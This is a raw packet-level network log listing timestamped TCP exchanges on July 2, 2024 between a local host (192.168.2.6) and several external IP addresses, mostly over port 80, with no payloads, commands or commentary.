Jul 2, 2024 00:05:08.408709049 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.635085106 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.635106087 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.635117054 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.635127068 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.635138035 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.635149002 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.635157108 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.635160923 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.635185003 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.635221958 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.635356903 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.635366917 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.635376930 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.635387897 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.635428905 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.635428905 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.635540962 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.635555983 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.635565996 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.635576963 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.635587931 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.635597944 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.635598898 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.635606050 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.635607958 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.635618925 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.635633945 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.635633945 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.635684967 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.635684967 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.635790110 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.635914087 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.635938883 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.635950089 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.635966063 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.635973930 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.635976076 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.635987997 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.635989904 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.635998011 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636008024 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636017084 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636028051 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636037111 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636039972 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.636039972 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.636046886 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636058092 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636059999 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.636081934 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.636102915 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.636249065 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636260033 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636269093 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636279106 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636290073 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636301041 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636311054 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636321068 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636322021 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.636322021 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.636332035 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636341095 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636352062 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636377096 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.636377096 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.636394024 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.636434078 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.636465073 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636504889 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.636512995 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636574030 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.636697054 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636701107 CEST	443	49727	162.159.133.233	192.168.2.6
Jul 2, 2024 00:05:08.636708975 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636723995 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636734962 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636744022 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636754036 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636764050 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636771917 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.636775017 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636774063 CEST	49727	443	192.168.2.6	162.159.133.233
Jul 2, 2024 00:05:08.636785984 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636790037 CEST	443	49727	162.159.133.233	192.168.2.6
Jul 2, 2024 00:05:08.636791945 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.636796951 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636807919 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636816978 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.636854887 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.636854887 CEST	443	49732	104.192.141.1	192.168.2.6
Jul 2, 2024 00:05:08.636856079 CEST	49727	443	192.168.2.6	162.159.133.233
Jul 2, 2024 00:05:08.636858940 CEST	443	49727	162.159.133.233	192.168.2.6
Jul 2, 2024 00:05:08.636877060 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636878014 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.636887074 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636897087 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636907101 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636924028 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636928082 CEST	49732	443	192.168.2.6	104.192.141.1
Jul 2, 2024 00:05:08.636933088 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636934042 CEST	49727	443	192.168.2.6	162.159.133.233
Jul 2, 2024 00:05:08.636944056 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636955976 CEST	49732	443	192.168.2.6	104.192.141.1
Jul 2, 2024 00:05:08.636956930 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636957884 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.636960983 CEST	49727	443	192.168.2.6	162.159.133.233
Jul 2, 2024 00:05:08.636965990 CEST	443	49732	104.192.141.1	192.168.2.6
Jul 2, 2024 00:05:08.636967897 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636975050 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.636979103 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.636979103 CEST	443	49727	162.159.133.233	192.168.2.6
Jul 2, 2024 00:05:08.636989117 CEST	443	49732	104.192.141.1	192.168.2.6
Jul 2, 2024 00:05:08.636993885 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637006044 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637010098 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.637010098 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.637012005 CEST	49732	443	192.168.2.6	104.192.141.1
Jul 2, 2024 00:05:08.637016058 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637026072 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637037992 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637047052 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637049913 CEST	49732	443	192.168.2.6	104.192.141.1
Jul 2, 2024 00:05:08.637058020 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637067080 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637072086 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.637078047 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637089968 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637099981 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637109995 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637114048 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.637114048 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.637120962 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637137890 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.637139082 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637145042 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.637192011 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.637192011 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.637367964 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637377977 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637387991 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637398005 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637408018 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637418985 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637419939 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.637434006 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.637445927 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.637455940 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.637459040 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.637459040 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.637465954 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.637475014 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.637478113 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.637491941 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637495041 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.637501955 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637511969 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637522936 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637526989 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.637531042 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.637542009 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.637548923 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.637552977 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.637562990 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.637568951 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.637574911 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.637587070 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.637598038 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.637604952 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.637608051 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637618065 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637628078 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637640953 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637650013 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.637650013 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.637650967 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637655020 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.637662888 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637671947 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.637674093 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.637685061 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.637692928 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.637693882 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.637706041 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.637716055 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.637717009 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.637727976 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.637738943 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.637748957 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.637758017 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.637763023 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.637763023 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.637767076 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.637768030 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.637790918 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.637819052 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.638657093 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.638669968 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.638679028 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.638689995 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.638699055 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.638710022 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.638720036 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.638730049 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.638740063 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.638741970 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.638741970 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.638752937 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.638756990 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.638756990 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.638766050 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.638782024 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.638782978 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.638793945 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.638803959 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.638808966 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.638809919 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.638813972 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.638824940 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.638834953 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.638844967 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.638850927 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.638850927 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.638854980 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.638865948 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.638875961 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.638875961 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.638887882 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.638892889 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.638904095 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.638914108 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.638916969 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.638916969 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.638925076 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.638935089 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.638946056 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.638947964 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.638950109 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.638951063 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.638967037 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.638978958 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.638981104 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.638988972 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.638997078 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.638999939 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.639009953 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.639009953 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.639020920 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.639030933 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.639040947 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.639045954 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.639050961 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.639079094 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.639079094 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.639126062 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.639754057 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.639765024 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.639774084 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.639782906 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.639794111 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.639803886 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.639813900 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.639823914 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.639825106 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.639826059 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.639834881 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.639844894 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.639853954 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.639863968 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.639868975 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.639868975 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.639880896 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.639892101 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.639897108 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.639897108 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.639903069 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.639914036 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.639921904 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.639931917 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.639940023 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.639941931 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.639951944 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.639964104 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.639970064 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.639971972 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.639975071 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.639986038 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.639992952 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.639992952 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.639997005 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640010118 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640019894 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640023947 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.640032053 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640043020 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640049934 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.640053034 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.640064001 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.640067101 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.640074015 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.640084028 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.640094042 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.640104055 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.640110970 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.640111923 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.640114069 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640125036 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640125990 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.640136003 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640173912 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.640173912 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.640196085 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.640455961 CEST	49715	80	192.168.2.6	80.78.242.100
Jul 2, 2024 00:05:08.640662909 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640674114 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640682936 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640693903 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640703917 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640713930 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640723944 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640724897 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.640734911 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640747070 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640757084 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640764952 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.640764952 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.640767097 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640777111 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640791893 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.640804052 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.640809059 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.640814066 CEST	80	49717	77.91.77.80	192.168.2.6
